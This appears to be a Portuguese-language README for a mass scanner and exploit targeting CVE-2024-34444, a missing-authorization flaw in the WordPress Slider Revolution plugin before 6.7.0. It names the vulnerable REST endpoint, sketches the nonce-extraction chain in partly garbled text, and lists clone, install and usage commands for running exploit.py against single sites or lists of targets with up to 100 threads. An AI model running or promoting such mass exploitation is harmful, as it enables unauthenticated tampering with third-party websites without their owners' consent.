
Scanner em massa multithread para CVE-2024-34444 (Autorização Ausente) no plugin WordPress Slider Revolution. Automatiza extração de nonce, detecção de versão e exploração via API REST para modificação não autenticada de dados do slider.
Scanner profissional em massa para CVE-2024-34444 que afeta o plugin Slider Revolution do WordPress < 6.7.0
Banner
CVE-2024-34444 é uma vulnerabilidade de Autorização Ausente no plugin Slider Revolution do WordPress (versões < 6.7.0). Este scanner automatiza a detecção e exploração de instalações vulneráveis por meio do endpoint da API REST /wp-json/revslider/v1/slider/save.
Cadeia de Vulnerabilidade:
revslider_actions do frontend (acessível publicamente)check_nonce() na API RESTreadme.txt-v) para registro detalhado-o) para salvar resultadosgit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v